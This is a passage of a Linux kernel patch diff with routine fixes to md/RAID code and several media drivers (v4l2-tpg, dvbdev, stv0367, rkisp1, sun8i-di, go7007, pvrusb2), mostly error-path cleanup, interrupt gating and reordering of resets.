+ 				clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 				err = mddev->pers->start_reshape(mddev);
++			} else {
++				/*
++				 * If reshape is still in progress, and
++				 * md_check_recovery() can continue to reshape,
++				 * don't restart reshape because data can be
++				 * corrupted for raid456.
++				 */
++				clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery);
+ 			}
+ 			mddev_unlock(mddev);
+ 		}
+@@ -6233,7 +6243,15 @@ static void md_clean(struct mddev *mddev)
+ 	mddev->persistent = 0;
+ 	mddev->level = LEVEL_NONE;
+ 	mddev->clevel[0] = 0;
+-	mddev->flags = 0;
++	/*
++	 * Don't clear MD_CLOSING, or mddev can be opened again.
++	 * 'hold_active != 0' means mddev is still in the creation
++	 * process and will be used later.
++	 */
++	if (mddev->hold_active)
++		mddev->flags = 0;
++	else
++		mddev->flags &= BIT_ULL_MASK(MD_CLOSING);
+ 	mddev->sb_flags = 0;
+ 	mddev->ro = MD_RDWR;
+ 	mddev->metadata_type[0] = 0;
+@@ -7561,7 +7579,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 	int err = 0;
+ 	void __user *argp = (void __user *)arg;
+ 	struct mddev *mddev = NULL;
+-	bool did_set_md_closing = false;
+ 
+ 	if (!md_ioctl_valid(cmd))
+ 		return -ENOTTY;
+@@ -7648,7 +7665,6 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 			err = -EBUSY;
+ 			goto out;
+ 		}
+-		did_set_md_closing = true;
+ 		mutex_unlock(&mddev->open_mutex);
+ 		sync_blockdev(bdev);
+ 	}
+@@ -7811,7 +7827,7 @@ static int md_ioctl(struct block_device *bdev, fmode_t mode,
+ 		mddev->hold_active = 0;
+ 	mddev_unlock(mddev);
+ out:
+-	if(did_set_md_closing)
++	if (cmd == STOP_ARRAY_RO || (err && cmd == STOP_ARRAY))
+ 		clear_bit(MD_CLOSING, &mddev->flags);
+ 	return err;
+ }
+diff --git a/drivers/md/persistent-data/dm-btree.c b/drivers/md/persistent-data/dm-btree.c
+index 1cc783d7030d8..18d949d63543b 100644
+--- a/drivers/md/persistent-data/dm-btree.c
++++ b/drivers/md/persistent-data/dm-btree.c
+@@ -726,7 +726,7 @@ static int shadow_child(struct dm_btree_info *info, struct dm_btree_value_type *
+  * nodes, so saves metadata space.
+  */
+ static int split_two_into_three(struct shadow_spine *s, unsigned int parent_index,
+-                                struct dm_btree_value_type *vt, uint64_t key)
++				struct dm_btree_value_type *vt, uint64_t key)
+ {
+ 	int r;
+ 	unsigned int middle_index;
+@@ -781,7 +781,7 @@ static int split_two_into_three(struct shadow_spine *s, unsigned int parent_inde
+ 		if (shadow_current(s) != right)
+ 			unlock_block(s->info, right);
+ 
+-	        return r;
++		return r;
+ 	}
+ 
+ 
+@@ -1216,7 +1216,7 @@ int btree_get_overwrite_leaf(struct dm_btree_info *info, dm_block_t root,
+ static bool need_insert(struct btree_node *node, uint64_t *keys,
+ 			unsigned int level, unsigned int index)
+ {
+-        return ((index >= le32_to_cpu(node->header.nr_entries)) ||
++	return ((index >= le32_to_cpu(node->header.nr_entries)) ||
+ 		(le64_to_cpu(node->keys[index]) != keys[level]));
+ }
+ 
+diff --git a/drivers/md/persistent-data/dm-space-map-common.c b/drivers/md/persistent-data/dm-space-map-common.c
+index af800efed9f3c..4833a3998c1d9 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.c
++++ b/drivers/md/persistent-data/dm-space-map-common.c
+@@ -390,7 +390,7 @@ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ }
+ 
+ int sm_ll_find_common_free_block(struct ll_disk *old_ll, struct ll_disk *new_ll,
+-	                         dm_block_t begin, dm_block_t end, dm_block_t *b)
++				 dm_block_t begin, dm_block_t end, dm_block_t *b)
+ {
+ 	int r;
+ 	uint32_t count;
+diff --git a/drivers/md/persistent-data/dm-space-map-common.h b/drivers/md/persistent-data/dm-space-map-common.h
+index 706ceb85d6800..63d9a72e3265c 100644
+--- a/drivers/md/persistent-data/dm-space-map-common.h
++++ b/drivers/md/persistent-data/dm-space-map-common.h
+@@ -120,7 +120,7 @@ int sm_ll_lookup(struct ll_disk *ll, dm_block_t b, uint32_t *result);
+ int sm_ll_find_free_block(struct ll_disk *ll, dm_block_t begin,
+ 			  dm_block_t end, dm_block_t *result);
+ int sm_ll_find_common_free_block(struct ll_disk *old_ll, struct ll_disk *new_ll,
+-	                         dm_block_t begin, dm_block_t end, dm_block_t *result);
++				 dm_block_t begin, dm_block_t end, dm_block_t *result);
+ 
+ /*
+  * The next three functions return (via nr_allocations) the net number of
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 7b318e7e8d459..009f7ffe4e10c 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -920,6 +920,7 @@ static void flush_pending_writes(struct r10conf *conf)
+ 
+ 			raid1_submit_write(bio);
+ 			bio = next;
++			cond_resched();
+ 		}
+ 		blk_finish_plug(&plug);
+ 	} else
+@@ -1130,6 +1131,7 @@ static void raid10_unplug(struct blk_plug_cb *cb, bool from_schedule)
+ 
+ 		raid1_submit_write(bio);
+ 		bio = next;
++		cond_resched();
+ 	}
+ 	kfree(plug);
+ }
+diff --git a/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c b/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
+index 303d02b1d71c9..fe30f5b0050dd 100644
+--- a/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
++++ b/drivers/media/common/v4l2-tpg/v4l2-tpg-core.c
+@@ -113,6 +113,7 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ {
+ 	unsigned pat;
+ 	unsigned plane;
++	int ret = 0;
+ 
+ 	tpg->max_line_width = max_w;
+ 	for (pat = 0; pat < TPG_MAX_PAT_LINES; pat++) {
+@@ -121,14 +122,18 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ 
+ 			tpg->lines[pat][plane] =
+ 				vzalloc(array3_size(max_w, 2, pixelsz));
+-			if (!tpg->lines[pat][plane])
+-				return -ENOMEM;
++			if (!tpg->lines[pat][plane]) {
++				ret = -ENOMEM;
++				goto free_lines;
++			}
+ 			if (plane == 0)
+ 				continue;
+ 			tpg->downsampled_lines[pat][plane] =
+ 				vzalloc(array3_size(max_w, 2, pixelsz));
+-			if (!tpg->downsampled_lines[pat][plane])
+-				return -ENOMEM;
++			if (!tpg->downsampled_lines[pat][plane]) {
++				ret = -ENOMEM;
++				goto free_lines;
++			}
+ 		}
+ 	}
+ 	for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
+@@ -136,18 +141,45 @@ int tpg_alloc(struct tpg_data *tpg, unsigned max_w)
+ 
+ 		tpg->contrast_line[plane] =
+ 			vzalloc(array_size(pixelsz, max_w));
+-		if (!tpg->contrast_line[plane])
+-			return -ENOMEM;
++		if (!tpg->contrast_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 		tpg->black_line[plane] =
+ 			vzalloc(array_size(pixelsz, max_w));
+-		if (!tpg->black_line[plane])
+-			return -ENOMEM;
++		if (!tpg->black_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 		tpg->random_line[plane] =
+ 			vzalloc(array3_size(max_w, 2, pixelsz));
+-		if (!tpg->random_line[plane])
+-			return -ENOMEM;
++		if (!tpg->random_line[plane]) {
++			ret = -ENOMEM;
++			goto free_contrast_line;
++		}
+ 	}
+ 	return 0;
++
++free_contrast_line:
++	for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
++		vfree(tpg->contrast_line[plane]);
++		vfree(tpg->black_line[plane]);
++		vfree(tpg->random_line[plane]);
++		tpg->contrast_line[plane] = NULL;
++		tpg->black_line[plane] = NULL;
++		tpg->random_line[plane] = NULL;
++	}
++free_lines:
++	for (pat = 0; pat < TPG_MAX_PAT_LINES; pat++)
++		for (plane = 0; plane < TPG_MAX_PLANES; plane++) {
++			vfree(tpg->lines[pat][plane]);
++			tpg->lines[pat][plane] = NULL;
++			if (plane == 0)
++				continue;
++			vfree(tpg->downsampled_lines[pat][plane]);
++			tpg->downsampled_lines[pat][plane] = NULL;
++		}
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(tpg_alloc);
+ 
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index d352e028491aa..aefee2277254d 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -494,6 +494,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
+ 		if (!dvbdevfops) {
+ 			kfree(dvbdev);
++			*pdvbdev = NULL;
+ 			mutex_unlock(&dvbdev_register_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -502,6 +503,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		if (!new_node) {
+ 			kfree(dvbdevfops);
+ 			kfree(dvbdev);
++			*pdvbdev = NULL;
+ 			mutex_unlock(&dvbdev_register_lock);
+ 			return -ENOMEM;
+ 		}
+@@ -535,6 +537,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		}
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		up_write(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return -EINVAL;
+@@ -557,6 +560,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return ret;
+ 	}
+@@ -575,6 +579,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+ 		kfree(dvbdev);
++		*pdvbdev = NULL;
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return PTR_ERR(clsdev);
+ 	}
+diff --git a/drivers/media/dvb-frontends/stv0367.c b/drivers/media/dvb-frontends/stv0367.c
+index 04556b77c16c9..0977564a4a1a4 100644
+--- a/drivers/media/dvb-frontends/stv0367.c
++++ b/drivers/media/dvb-frontends/stv0367.c
+@@ -118,50 +118,32 @@ static const s32 stv0367cab_RF_LookUp2[RF_LOOKUP_TABLE2_SIZE][RF_LOOKUP_TABLE2_S
+ 	}
+ };
+ 
+-static
+-int stv0367_writeregs(struct stv0367_state *state, u16 reg, u8 *data, int len)
++static noinline_for_stack
++int stv0367_writereg(struct stv0367_state *state, u16 reg, u8 data)
+ {
+-	u8 buf[MAX_XFER_SIZE];
++	u8 buf[3] = { MSB(reg), LSB(reg), data };
+ 	struct i2c_msg msg = {
+ 		.addr = state->config->demod_address,
+ 		.flags = 0,
+ 		.buf = buf,
+-		.len = len + 2
++		.len = 3,
+ 	};
+ 	int ret;
+ 
+-	if (2 + len > sizeof(buf)) {
+-		printk(KERN_WARNING
+-		       "%s: i2c wr reg=%04x: len=%d is too big!\n",
+-		       KBUILD_MODNAME, reg, len);
+-		return -EINVAL;
+-	}
+-
+-
+-	buf[0] = MSB(reg);
+-	buf[1] = LSB(reg);
+-	memcpy(buf + 2, data, len);
+-
+ 	if (i2cdebug)
+ 		printk(KERN_DEBUG "%s: [%02x] %02x: %02x\n", __func__,
+-			state->config->demod_address, reg, buf[2]);
++			state->config->demod_address, reg, data);
+ 
+ 	ret = i2c_transfer(state->i2c, &msg, 1);
+ 	if (ret != 1)
+ 		printk(KERN_ERR "%s: i2c write error! ([%02x] %02x: %02x)\n",
+-			__func__, state->config->demod_address, reg, buf[2]);
++			__func__, state->config->demod_address, reg, data);
+ 
+ 	return (ret != 1) ? -EREMOTEIO : 0;
+ }
+ 
+-static int stv0367_writereg(struct stv0367_state *state, u16 reg, u8 data)
+-{
+-	u8 tmp = data; /* see gcc.gnu.org/bugzilla/show_bug.cgi?id=81715 */
+-
+-	return stv0367_writeregs(state, reg, &tmp, 1);
+-}
+-
+-static u8 stv0367_readreg(struct stv0367_state *state, u16 reg)
++static noinline_for_stack
++u8 stv0367_readreg(struct stv0367_state *state, u16 reg)
+ {
+ 	u8 b0[] = { 0, 0 };
+ 	u8 b1[] = { 0 };
+diff --git a/drivers/media/i2c/tc358743.c b/drivers/media/i2c/tc358743.c
+index 200841c1f5cf0..68628ccecd161 100644
+--- a/drivers/media/i2c/tc358743.c
++++ b/drivers/media/i2c/tc358743.c
+@@ -2094,9 +2094,6 @@ static int tc358743_probe(struct i2c_client *client)
+ 	state->mbus_fmt_code = MEDIA_BUS_FMT_RGB888_1X24;
+ 
+ 	sd->dev = &client->dev;
+-	err = v4l2_async_register_subdev(sd);
+-	if (err < 0)
+-		goto err_hdl;
+ 
+ 	mutex_init(&state->confctl_mutex);
+ 
+@@ -2154,6 +2151,10 @@ static int tc358743_probe(struct i2c_client *client)
+ 	if (err)
+ 		goto err_work_queues;
+ 
++	err = v4l2_async_register_subdev(sd);
++	if (err < 0)
++		goto err_work_queues;
++
+ 	v4l2_info(sd, "%s found @ 0x%x (%s)\n", client->name,
+ 		  client->addr << 1, client->adapter->name);
+ 
+diff --git a/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c b/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
+index b065ccd069140..378a1cba0144f 100644
+--- a/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
++++ b/drivers/media/platform/mediatek/mdp/mtk_mdp_vpu.c
+@@ -26,7 +26,7 @@ static void mtk_mdp_vpu_handle_init_ack(const struct mdp_ipi_comm_ack *msg)
+ 	vpu->inst_addr = msg->vpu_inst_addr;
+ }
+ 
+-static void mtk_mdp_vpu_ipi_handler(const void *data, unsigned int len,
++static void mtk_mdp_vpu_ipi_handler(void *data, unsigned int len,
+ 				    void *priv)
+ {
+ 	const struct mdp_ipi_comm_ack *msg = data;
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
+index cfc7ebed8fb7a..1ec29f1b163a1 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_fw_vpu.c
+@@ -29,15 +29,7 @@ static int mtk_vcodec_vpu_set_ipi_register(struct mtk_vcodec_fw *fw, int id,
+ 					   mtk_vcodec_ipi_handler handler,
+ 					   const char *name, void *priv)
+ {
+-	/*
+-	 * The handler we receive takes a void * as its first argument. We
+-	 * cannot change this because it needs to be passed down to the rproc
+-	 * subsystem when SCP is used. VPU takes a const argument, which is
+-	 * more constrained, so the conversion below is safe.
+-	 */
+-	ipi_handler_t handler_const = (ipi_handler_t)handler;
+-
+-	return vpu_ipi_register(fw->pdev, id, handler_const, name, priv);
++	return vpu_ipi_register(fw->pdev, id, handler, name, priv);
+ }
+ 
+ static int mtk_vcodec_vpu_ipi_send(struct mtk_vcodec_fw *fw, int id, void *buf,
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.c b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+index 6beab9e86a22a..44adf5cfc9bb2 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.c
++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.c
+@@ -635,7 +635,7 @@ int vpu_load_firmware(struct platform_device *pdev)
+ }
+ EXPORT_SYMBOL_GPL(vpu_load_firmware);
+ 
+-static void vpu_init_ipi_handler(const void *data, unsigned int len, void *priv)
++static void vpu_init_ipi_handler(void *data, unsigned int len, void *priv)
+ {
+ 	struct mtk_vpu *vpu = priv;
+ 	const struct vpu_run *run = data;
+diff --git a/drivers/media/platform/mediatek/vpu/mtk_vpu.h b/drivers/media/platform/mediatek/vpu/mtk_vpu.h
+index a56053ff135af..da05f3e740810 100644
+--- a/drivers/media/platform/mediatek/vpu/mtk_vpu.h
++++ b/drivers/media/platform/mediatek/vpu/mtk_vpu.h
+@@ -17,7 +17,7 @@
+  * VPU interfaces with other blocks by share memory and interrupt.
+  */
+ 
+-typedef void (*ipi_handler_t) (const void *data,
++typedef void (*ipi_handler_t) (void *data,
+ 			       unsigned int len,
+ 			       void *priv);
+ 
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
+index d4540684ea9af..0bcb9db5ad190 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-capture.c
+@@ -701,6 +701,9 @@ irqreturn_t rkisp1_capture_isr(int irq, void *ctx)
+ 	unsigned int i;
+ 	u32 status;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_MI_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+index f9ec1c6138947..5776292f914a4 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-common.h
+@@ -467,6 +467,7 @@ struct rkisp1_debug {
+  * @debug:	   debug params to be exposed on debugfs
+  * @info:	   version-specific ISP information
+  * @irqs:          IRQ line numbers
++ * @irqs_enabled:  the hardware is enabled and can cause interrupts
+  */
+ struct rkisp1_device {
+ 	void __iomem *base_addr;
+@@ -488,6 +489,7 @@ struct rkisp1_device {
+ 	struct rkisp1_debug debug;
+ 	const struct rkisp1_info *info;
+ 	int irqs[RKISP1_NUM_IRQS];
++	bool irqs_enabled;
+ };
+ 
+ /*
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+index e862f515cc6d3..95b6e41c48ec2 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-csi.c
+@@ -211,6 +211,9 @@ irqreturn_t rkisp1_csi_isr(int irq, void *ctx)
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 	u32 val, status;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_MIPI_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index 41abb18b00acb..7a3b69ba51b97 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -305,6 +305,24 @@ static int __maybe_unused rkisp1_runtime_suspend(struct device *dev)
+ {
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 
++	rkisp1->irqs_enabled = false;
++	/* Make sure the IRQ handler will see the above */
++	mb();
++
++	/*
++	 * Wait until any running IRQ handler has returned. The IRQ handler
++	 * may get called even after this (as it's a shared interrupt line)
++	 * but the 'irqs_enabled' flag will make the handler return immediately.
++	 */
++	for (unsigned int il = 0; il < ARRAY_SIZE(rkisp1->irqs); ++il) {
++		if (rkisp1->irqs[il] == -1)
++			continue;
++
++		/* Skip if the irq line is the same as previous */
++		if (il == 0 || rkisp1->irqs[il - 1] != rkisp1->irqs[il])
++			synchronize_irq(rkisp1->irqs[il]);
++	}
++
+ 	clk_bulk_disable_unprepare(rkisp1->clk_size, rkisp1->clks);
+ 	return pinctrl_pm_select_sleep_state(dev);
+ }
+@@ -321,6 +339,10 @@ static int __maybe_unused rkisp1_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
++	rkisp1->irqs_enabled = true;
++	/* Make sure the IRQ handler will see the above */
++	mb();
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+index 00dca284c1222..2af5c1a48070b 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-isp.c
+@@ -1023,6 +1023,9 @@ irqreturn_t rkisp1_isp_isr(int irq, void *ctx)
+ 	struct rkisp1_device *rkisp1 = dev_get_drvdata(dev);
+ 	u32 status, isp_err;
+ 
++	if (!rkisp1->irqs_enabled)
++		return IRQ_NONE;
++
+ 	status = rkisp1_read(rkisp1, RKISP1_CIF_ISP_MIS);
+ 	if (!status)
+ 		return IRQ_NONE;
+diff --git a/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c b/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
+index aa65d70b6270a..7a2f558c981db 100644
+--- a/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
++++ b/drivers/media/platform/sunxi/sun8i-di/sun8i-di.c
+@@ -66,6 +66,7 @@ static void deinterlace_device_run(void *priv)
+ 	struct vb2_v4l2_buffer *src, *dst;
+ 	unsigned int hstep, vstep;
+ 	dma_addr_t addr;
++	int i;
+ 
+ 	src = v4l2_m2m_next_src_buf(ctx->fh.m2m_ctx);
+ 	dst = v4l2_m2m_next_dst_buf(ctx->fh.m2m_ctx);
+@@ -160,6 +161,26 @@ static void deinterlace_device_run(void *priv)
+ 	deinterlace_write(dev, DEINTERLACE_CH1_HORZ_FACT, hstep);
+ 	deinterlace_write(dev, DEINTERLACE_CH1_VERT_FACT, vstep);
+ 
++	/* neutral filter coefficients */
++	deinterlace_set_bits(dev, DEINTERLACE_FRM_CTRL,
++			     DEINTERLACE_FRM_CTRL_COEF_ACCESS);
++	readl_poll_timeout(dev->base + DEINTERLACE_STATUS, val,
++			   val & DEINTERLACE_STATUS_COEF_STATUS, 2, 40);
++
++	for (i = 0; i < 32; i++) {
++		deinterlace_write(dev, DEINTERLACE_CH0_HORZ_COEF0 + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH0_VERT_COEF + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH1_HORZ_COEF0 + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++		deinterlace_write(dev, DEINTERLACE_CH1_VERT_COEF + i * 4,
++				  DEINTERLACE_IDENTITY_COEF);
++	}
++
++	deinterlace_clr_set_bits(dev, DEINTERLACE_FRM_CTRL,
++				 DEINTERLACE_FRM_CTRL_COEF_ACCESS, 0);
++
+ 	deinterlace_clr_set_bits(dev, DEINTERLACE_FIELD_CTRL,
+ 				 DEINTERLACE_FIELD_CTRL_FIELD_CNT_MSK,
+ 				 DEINTERLACE_FIELD_CTRL_FIELD_CNT(ctx->field));
+@@ -248,7 +269,6 @@ static irqreturn_t deinterlace_irq(int irq, void *data)
+ static void deinterlace_init(struct deinterlace_dev *dev)
+ {
+ 	u32 val;
+-	int i;
+ 
+ 	deinterlace_write(dev, DEINTERLACE_BYPASS,
+ 			  DEINTERLACE_BYPASS_CSC);
+@@ -284,27 +304,7 @@ static void deinterlace_init(struct deinterlace_dev *dev)
+ 
+ 	deinterlace_clr_set_bits(dev, DEINTERLACE_CHROMA_DIFF,
+ 				 DEINTERLACE_CHROMA_DIFF_TH_MSK,
+-				 DEINTERLACE_CHROMA_DIFF_TH(5));
+-
+-	/* neutral filter coefficients */
+-	deinterlace_set_bits(dev, DEINTERLACE_FRM_CTRL,
+-			     DEINTERLACE_FRM_CTRL_COEF_ACCESS);
+-	readl_poll_timeout(dev->base + DEINTERLACE_STATUS, val,
+-			   val & DEINTERLACE_STATUS_COEF_STATUS, 2, 40);
+-
+-	for (i = 0; i < 32; i++) {
+-		deinterlace_write(dev, DEINTERLACE_CH0_HORZ_COEF0 + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH0_VERT_COEF + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH1_HORZ_COEF0 + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-		deinterlace_write(dev, DEINTERLACE_CH1_VERT_COEF + i * 4,
+-				  DEINTERLACE_IDENTITY_COEF);
+-	}
+-
+-	deinterlace_clr_set_bits(dev, DEINTERLACE_FRM_CTRL,
+-				 DEINTERLACE_FRM_CTRL_COEF_ACCESS, 0);
++				 DEINTERLACE_CHROMA_DIFF_TH(31));
+ }
+ 
+ static inline struct deinterlace_ctx *deinterlace_file2ctx(struct file *file)
+@@ -931,11 +931,18 @@ static int deinterlace_runtime_resume(struct device *device)
+ 		return ret;
+ 	}
+ 
++	ret = reset_control_deassert(dev->rstc);
++	if (ret) {
++		dev_err(dev->dev, "Failed to apply reset\n");
++
++		goto err_exclusive_rate;
++	}
++
+ 	ret = clk_prepare_enable(dev->bus_clk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "Failed to enable bus clock\n");
+ 
+-		goto err_exclusive_rate;
++		goto err_rst;
+ 	}
+ 
+ 	ret = clk_prepare_enable(dev->mod_clk);
+@@ -952,23 +959,16 @@ static int deinterlace_runtime_resume(struct device *device)
+ 		goto err_mod_clk;
+ 	}
+ 
+-	ret = reset_control_deassert(dev->rstc);
+-	if (ret) {
+-		dev_err(dev->dev, "Failed to apply reset\n");
+-
+-		goto err_ram_clk;
+-	}
+-
+ 	deinterlace_init(dev);
+ 
+ 	return 0;
+ 
+-err_ram_clk:
+-	clk_disable_unprepare(dev->ram_clk);
+ err_mod_clk:
+ 	clk_disable_unprepare(dev->mod_clk);
+ err_bus_clk:
+ 	clk_disable_unprepare(dev->bus_clk);
++err_rst:
++	reset_control_assert(dev->rstc);
+ err_exclusive_rate:
+ 	clk_rate_exclusive_put(dev->mod_clk);
+ 
+@@ -979,11 +979,12 @@ static int deinterlace_runtime_suspend(struct device *device)
+ {
+ 	struct deinterlace_dev *dev = dev_get_drvdata(device);
+ 
+-	reset_control_assert(dev->rstc);
+-
+ 	clk_disable_unprepare(dev->ram_clk);
+ 	clk_disable_unprepare(dev->mod_clk);
+ 	clk_disable_unprepare(dev->bus_clk);
++
++	reset_control_assert(dev->rstc);
++
+ 	clk_rate_exclusive_put(dev->mod_clk);
+ 
+ 	return 0;
+diff --git a/drivers/media/usb/em28xx/em28xx-cards.c b/drivers/media/usb/em28xx/em28xx-cards.c
+index 4d037c92af7c5..bae76023cf71d 100644
+--- a/drivers/media/usb/em28xx/em28xx-cards.c
++++ b/drivers/media/usb/em28xx/em28xx-cards.c
+@@ -4094,6 +4094,10 @@ static int em28xx_usb_probe(struct usb_interface *intf,
+ 	 * topology will likely change after the load of the em28xx subdrivers.
+ 	 */
+ #ifdef CONFIG_MEDIA_CONTROLLER
++	/*
++	 * No need to check the return value, the device will still be
++	 * usable without media controller API.
++	 */
+ 	retval = media_device_register(dev->media_dev);
+ #endif
+ 
+diff --git a/drivers/media/usb/go7007/go7007-driver.c b/drivers/media/usb/go7007/go7007-driver.c
+index 0c24e29843048..eb03f98b2ef11 100644
+--- a/drivers/media/usb/go7007/go7007-driver.c
++++ b/drivers/media/usb/go7007/go7007-driver.c
+@@ -80,7 +80,7 @@ static int go7007_load_encoder(struct go7007 *go)
+ 	const struct firmware *fw_entry;
+ 	char fw_name[] = "go7007/go7007fw.bin";
+ 	void *bounce;
+-	int fw_len, rv = 0;
++	int fw_len;
+ 	u16 intr_val, intr_data;
+ 
+ 	if (go->boot_fw == NULL) {
+@@ -109,9 +109,11 @@ static int go7007_load_encoder(struct go7007 *go)
+ 	    go7007_read_interrupt(go, &intr_val, &intr_data) < 0 ||
+ 			(intr_val & ~0x1) != 0x5a5a) {
+ 		v4l2_err(go, "error transferring firmware\n");
+-		rv = -1;
++		kfree(go->boot_fw);
++		go->boot_fw = NULL;
++		return -1;
+ 	}
+-	return rv;
++	return 0;
+ }
+ 
+ MODULE_FIRMWARE("go7007/go7007fw.bin");
+diff --git a/drivers/media/usb/go7007/go7007-usb.c b/drivers/media/usb/go7007/go7007-usb.c
+index eeb85981e02b6..762c13e49bfa5 100644
+--- a/drivers/media/usb/go7007/go7007-usb.c
++++ b/drivers/media/usb/go7007/go7007-usb.c
+@@ -1201,7 +1201,9 @@ static int go7007_usb_probe(struct usb_interface *intf,
+ 				u16 channel;
+ 
+ 				/* read channel number from GPIO[1:0] */
+-				go7007_read_addr(go, 0x3c81, &channel);
++				if (go7007_read_addr(go, 0x3c81, &channel))
++					goto allocfail;
++
+ 				channel &= 0x3;
+ 				go->board_id = GO7007_BOARDID_ADLINK_MPG24;
+ 				usb->board = board = &board_adlink_mpg24;
+diff --git a/drivers/media/usb/pvrusb2/pvrusb2-context.c b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+index 1764674de98bc..73c95ba2328a4 100644
+--- a/drivers/media/usb/pvrusb2/pvrusb2-context.c
++++ b/drivers/media/usb/pvrusb2/pvrusb2-context.c
+@@ -90,8 +90,10 @@ static void pvr2_context_destroy(struct pvr2_context *mp)
+ }
+ 
+ 
+-static void pvr2_context_notify(struct pvr2_context *mp)
++static void pvr2_context_notify(void *ptr)
+ {
++	struct pvr2_context *mp = ptr;
++
+ 	pvr2_context_set_notify(mp,!0);
+ }
+ 
